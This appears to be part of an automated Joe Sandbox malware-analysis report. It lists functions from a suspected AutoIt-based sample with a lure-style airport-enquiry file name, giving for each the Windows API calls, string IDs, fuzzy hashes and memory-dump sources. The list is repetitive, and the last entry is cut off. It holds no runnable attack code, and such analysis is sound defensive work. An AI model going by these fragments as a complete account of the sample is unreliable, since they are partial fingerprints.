            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CapsDesktopDeviceReleaseWindow
            • String ID:
            • API String ID: 2889604237-0
            • Opcode ID: 7a4b0fa4aa28787c753b3707cac1213482e9dd489987fa39304e2e114d78dbb3
            • Instruction ID: 51ac8558adca22dc05c61e59205fe3e906ba2bc0e5d727ba033b6d9048cba4d0
            • Opcode Fuzzy Hash: 7a4b0fa4aa28787c753b3707cac1213482e9dd489987fa39304e2e114d78dbb3
            • Instruction Fuzzy Hash: D7E01A75800704EFDB51AFA1C848BAD7BF1EB4C350F208429F95AD7720CB399541AF60
            APIs
            • GetDesktopWindow.USER32 ref: 00CC219B
            • GetDC.USER32(00000000), ref: 00CC21A5
            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CC21B1
            • ReleaseDC.USER32(?), ref: 00CC21D2
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CapsDesktopDeviceReleaseWindow
            • String ID:
            • API String ID: 2889604237-0
            • Opcode ID: ddbbb29997ea2c6d839eb00f8a33d1a869285755cd1268feaed8e41f9ff1146a
            • Instruction ID: b001e419e6dfe8b2e43cc9ca87764ce574823eaf53c54c17504a50e245d15da3
            • Opcode Fuzzy Hash: ddbbb29997ea2c6d839eb00f8a33d1a869285755cd1268feaed8e41f9ff1146a
            • Instruction Fuzzy Hash: 2CE0EEB5800704AFCB61AFA0C8487AD7BA1EB4C310F208029F95AE7720CB399141AF60
            APIs
            • OleSetContainedObject.OLE32(?,00000001), ref: 00CDB981
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ContainedObject
            • String ID: AutoIt3GUI$Container
            • API String ID: 3565006973-3941886329
            • Opcode ID: 60da2722e94f5dfa8209be5bddd10b24b5629d8a32f126019dfd188574bcb7a0
            • Instruction ID: 3395c83f287f32b521cddebae0c2e9889f1d09c90c95c38d47c1e859fac22929
            • Opcode Fuzzy Hash: 60da2722e94f5dfa8209be5bddd10b24b5629d8a32f126019dfd188574bcb7a0
            • Instruction Fuzzy Hash: 39913970600601DFDB24DF65C894A6AB7E8BF49710F25856EEA4ACB791DB70ED40CB60
            APIs
              • Part of subcall function 00C9FEC6: _wcscpy.LIBCMT ref: 00C9FEE9
              • Part of subcall function 00C89997: __itow.LIBCMT ref: 00C899C2
              • Part of subcall function 00C89997: __swprintf.LIBCMT ref: 00C89A0C
            • __wcsnicmp.LIBCMT ref: 00CEB298
            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00CEB361
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
            • String ID: LPT
            • API String ID: 3222508074-1350329615
            • Opcode ID: 7015c99bff6547353fb6b290194346b081c9eea5306fe00ef53f95a630c8e586
            • Instruction ID: 40e796dcb35ef533533d089450ee56aff0d7afc9e9c91768aaac357d67c99078
            • Opcode Fuzzy Hash: 7015c99bff6547353fb6b290194346b081c9eea5306fe00ef53f95a630c8e586
            • Instruction Fuzzy Hash: 9D618375A00215EFCB14EF95C886EBEB7B4EF08310F15406AF956AB3A1DB70AE40DB54
            APIs
            • Sleep.KERNEL32(00000000), ref: 00C92AC8
            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00C92AE1
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: GlobalMemorySleepStatus
            • String ID: @
            • API String ID: 2783356886-2766056989
            • Opcode ID: 1916b5cf60752a700125b62952166b65ce476105a7c9b31412e4c855079070fb
            • Instruction ID: cfaf67bd3cb3daa817e837d48dcf444578f5778435ebfd7bd76e13d2a53293f5
            • Opcode Fuzzy Hash: 1916b5cf60752a700125b62952166b65ce476105a7c9b31412e4c855079070fb
            • Instruction Fuzzy Hash: A25157714187449BD320BF50D886BAFBBE8FF84318F56885DF1DA811A1DB308529DB2B
            APIs
              • Part of subcall function 00C8506B: __fread_nolock.LIBCMT ref: 00C85089
            • _wcscmp.LIBCMT ref: 00CE9AAE
            • _wcscmp.LIBCMT ref: 00CE9AC1
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _wcscmp$__fread_nolock
            • String ID: FILE
            • API String ID: 4029003684-3121273764
            • Opcode ID: 451c4baf95529f3f1b1992cd9a18d1664513f2fccb00b275c1b8c4d40715234e
            • Instruction ID: 9c1ab5b5d602ed8748f0d78cba35731d7a88ed9db12d9f44b668f11c92c04ac6
            • Opcode Fuzzy Hash: 451c4baf95529f3f1b1992cd9a18d1664513f2fccb00b275c1b8c4d40715234e
            • Instruction Fuzzy Hash: 8841E372A0064ABADF20AAA5CC45FEFBBF9DF45714F000069B900E7181DBB5AE0497A5
            APIs
            • _memset.LIBCMT ref: 00CF2892
            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00CF28C8
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CrackInternet_memset
            • String ID: |
            • API String ID: 1413715105-2343686810
            • Opcode ID: 996e21ae076ae6216acc4ae470926106d303d4ca648b395f283e452db29bb13d
            • Instruction ID: a6e0293b3934e4251d32314f09366d1530949c6e12a8c18625c1370c035ff635
            • Opcode Fuzzy Hash: 996e21ae076ae6216acc4ae470926106d303d4ca648b395f283e452db29bb13d
            • Instruction Fuzzy Hash: 4F313071800219AFCF01EFA1DC85EEEBFB9FF08304F104125F915A61A5EB319A56DB61
            APIs
            • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00D07DD0
            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00D07DE5
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend
            • String ID: '
            • API String ID: 3850602802-1997036262
            • Opcode ID: a41e0b7ebcd81bbf68342efbf37500a0cbe11ae8eed49ea47e07c5bba92215de
            • Instruction ID: 81abd5b614bf78b9c6f2bed4cf9e626251960204c8a115e20bc31919c60d80a7
            • Opcode Fuzzy Hash: a41e0b7ebcd81bbf68342efbf37500a0cbe11ae8eed49ea47e07c5bba92215de
            • Instruction Fuzzy Hash: EC41E274E0520ADFDB54CF68D891BEABBB5FF09300F14016AE909AB391D771A951CFA0
            APIs
            • DestroyWindow.USER32(?,?,?,?), ref: 00D06D86
            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00D06DC2
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$DestroyMove
            • String ID: static
            • API String ID: 2139405536-2160076837
            • Opcode ID: 54a54a901912dc2419e67d53881ec365c9f8f80e8d2df46ff9c2b8bdec554a74
            • Instruction ID: afd25e50b6d51d195d957fc5d12f41095ca88af830b1bc040cf01f289ce61434
            • Opcode Fuzzy Hash: 54a54a901912dc2419e67d53881ec365c9f8f80e8d2df46ff9c2b8bdec554a74
            • Instruction Fuzzy Hash: 89315E71210604AEEB109F64CC80BFB77A9FF48724F148619F9AAD7190DA71EC91DB74
            APIs
            • _memset.LIBCMT ref: 00CE2E00
            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CE2E3B
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: InfoItemMenu_memset
            • String ID: 0
            • API String ID: 2223754486-4108050209
            • Opcode ID: 15562236ae607cd4ea64a8716ae663e0a966d0aae721d3e5e299d388957996a7
            • Instruction ID: ca6eb57f438e8310d113429e590853ee672663b29b662a5344ea53a0034b5b32
            • Opcode Fuzzy Hash: 15562236ae607cd4ea64a8716ae663e0a966d0aae721d3e5e299d388957996a7
            • Instruction Fuzzy Hash: C131F531A00395ABEB248F4ACC45BAEBBBDFF05351F180069E995A71A0E7709B40DB10
            APIs
            • __snwprintf.LIBCMT ref: 00CF3D5A
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __snwprintf_memmove
            • String ID: , $$AUTOITCALLVARIABLE%d
            • API String ID: 3506404897-2584243854
            • Opcode ID: 3f3b42c61b02157a8ff1c47ee15f6d7651f7f51950e6e9aa15716ce6d7f42d73
            • Instruction ID: 93d2f11432746608e60564353ae36c9eae0f68d63ae69e5e96ac6f5a165e81c8
            • Opcode Fuzzy Hash: 3f3b42c61b02157a8ff1c47ee15f6d7651f7f51950e6e9aa15716ce6d7f42d73
            • Instruction Fuzzy Hash: BB219E31600219AFCF15EF64CC86AADB7A4FF44704F500498F905AB281EB70EA05EBB6
            APIs
            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00D069D0
            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00D069DB
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend
            • String ID: Combobox
            • API String ID: 3850602802-2096851135
            • Opcode ID: ba3ce0555e8dbbd8227373160e32537946cd9610b33f4e1f07dd4c9b7843fb06
            • Instruction ID: f3332223a864b746c4010122dc08a00f0f3b77a4cd8b16595979d3d507cab1c4
            • Opcode Fuzzy Hash: ba3ce0555e8dbbd8227373160e32537946cd9610b33f4e1f07dd4c9b7843fb06
            • Instruction Fuzzy Hash: 7D11B2717002086FEF119F24DC80FAB376AEB893A4F154125F95C976D0D671DC618BB0
            APIs
              • Part of subcall function 00C81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C81D73
              • Part of subcall function 00C81D35: GetStockObject.GDI32(00000011), ref: 00C81D87
              • Part of subcall function 00C81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C81D91
            • GetWindowRect.USER32(00000000,?), ref: 00D06EE0
            • GetSysColor.USER32(00000012), ref: 00D06EFA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$ColorCreateMessageObjectRectSendStock
            • String ID: static
            • API String ID: 1983116058-2160076837
            • Opcode ID: 2554323057c65fdbcba623d537ac75164ac39f8448592e562b988bc206b30232
            • Instruction ID: e39c0619bc1d26417c31688c0273d55dfaccfcf53f1d6f8b23a7b7e236f2a2db
            • Opcode Fuzzy Hash: 2554323057c65fdbcba623d537ac75164ac39f8448592e562b988bc206b30232
            • Instruction Fuzzy Hash: EF21597261020AAFDB04DFA8DC45AEA7BB8FB08314F144629FD59D3290E634E8619B60
            APIs
            • GetWindowTextLengthW.USER32(00000000), ref: 00D06C11
            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00D06C20
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: LengthMessageSendTextWindow
            • String ID: edit
            • API String ID: 2978978980-2167791130
            • Opcode ID: 3136753b9c9561f2fc435abc19809e134016d614727d351ea418932334228efc
            • Instruction ID: 381a0f353207d23d5a3474e9abd1aa05a01799ad0b3f3566ec9888533cb17d7b
            • Opcode Fuzzy Hash: 3136753b9c9561f2fc435abc19809e134016d614727d351ea418932334228efc
            • Instruction Fuzzy Hash: 04116AB1500208ABEB209F64DC45BEB3BA9EB05378F644724F9A9D71E0C675DCA19B70
            APIs
            • _memset.LIBCMT ref: 00CE2F11
            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00CE2F30
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: InfoItemMenu_memset
            • String ID: 0
            • API String ID: 2223754486-4108050209
            • Opcode ID: 9e780d8135b7b9600eca6a75af9cfa20fce96b454109869ea62e089e7cad089f
            • Instruction ID: 48b5d55132fc713599519ddcd2da4c9ab6327b17d29ed13e8a658f400dfda559
            • Opcode Fuzzy Hash: 9e780d8135b7b9600eca6a75af9cfa20fce96b454109869ea62e089e7cad089f
            • Instruction Fuzzy Hash: 9011B2319012F4ABDB24DF9ADC45B9D77BDEB06314F1800A5E865E72A0D7B0EE04C7A9
            APIs
            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00CF2520
            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00CF2549
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Internet$OpenOption
            • String ID: <local>
            • API String ID: 942729171-4266983199
            • Opcode ID: 5e52bc6696abda9c4f197c328df8684a679901386a849cc315060f15240bb11e
            • Instruction ID: 1597d068fce9bbfaf48619dc9056e5b13150526d71230d4f69322b95ec5a82e2
            • Opcode Fuzzy Hash: 5e52bc6696abda9c4f197c328df8684a679901386a849cc315060f15240bb11e
            • Instruction Fuzzy Hash: 0711C6B0541229BEDB648F528C95EFBFF68FF05751F10812AF61586140D2705A45D6F2
            APIs
              • Part of subcall function 00CF830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00CF80C8,?,00000000,?,?), ref: 00CF8322
            • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00CF80CB
            • htons.WSOCK32(00000000,?,00000000), ref: 00CF8108
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ByteCharMultiWidehtonsinet_addr
            • String ID: 255.255.255.255
            • API String ID: 2496851823-2422070025
            • Opcode ID: a0608d7d9e080fb1184407fac77cdbd071e4b0b17f05fdda7b73fdab257a7f19
            • Instruction ID: acdccb89cfc839af30463692c8fdc8480315e5784335b30c1b03d5084c095c0f
            • Opcode Fuzzy Hash: a0608d7d9e080fb1184407fac77cdbd071e4b0b17f05fdda7b73fdab257a7f19
            • Instruction Fuzzy Hash: 8711A535600309ABDB20AF64CC86FBDB374FF44324F108617EA1597391DB71A919D756
            APIs
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
              • Part of subcall function 00CDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00CDB0E7
            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00CD9355
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ClassMessageNameSend_memmove
            • String ID: ComboBox$ListBox
            • API String ID: 372448540-1403004172
            • Opcode ID: c5fbf013eb9ebf738453ccb62ceee876602117fe6a541763f1bb328a10aa0017
            • Instruction ID: 7ee0fa2a98af187c4987d8d1dab2fadbb506e67c1b7329bf80e769bc096d7bae
            • Opcode Fuzzy Hash: c5fbf013eb9ebf738453ccb62ceee876602117fe6a541763f1bb328a10aa0017
            • Instruction Fuzzy Hash: DF01B575A05214ABCB04FBA5CC918FE7769FF06720B14071AFA32573D1DB31690CA760
            APIs
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
              • Part of subcall function 00CDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00CDB0E7
            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00CD924D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ClassMessageNameSend_memmove
            • String ID: ComboBox$ListBox
            • API String ID: 372448540-1403004172
            • Opcode ID: 8e4af9d98b16dc11461a880eead56c7cd747ca8eb9c9531c7a6236a5a700caca
            • Instruction ID: ca3b3c3add08ae453c11e1bc47cd11c1eef408b29282d99a2acf8d28ba23c325
            • Opcode Fuzzy Hash: 8e4af9d98b16dc11461a880eead56c7cd747ca8eb9c9531c7a6236a5a700caca
            • Instruction Fuzzy Hash: 1B018875A411047BCB14FBA0C992DFF73A8DF15700F24011A7612673C1EA61AF1CA775
            APIs
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
              • Part of subcall function 00CDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00CDB0E7
            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00CD92D0
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ClassMessageNameSend_memmove
            • String ID: ComboBox$ListBox
            • API String ID: 372448540-1403004172
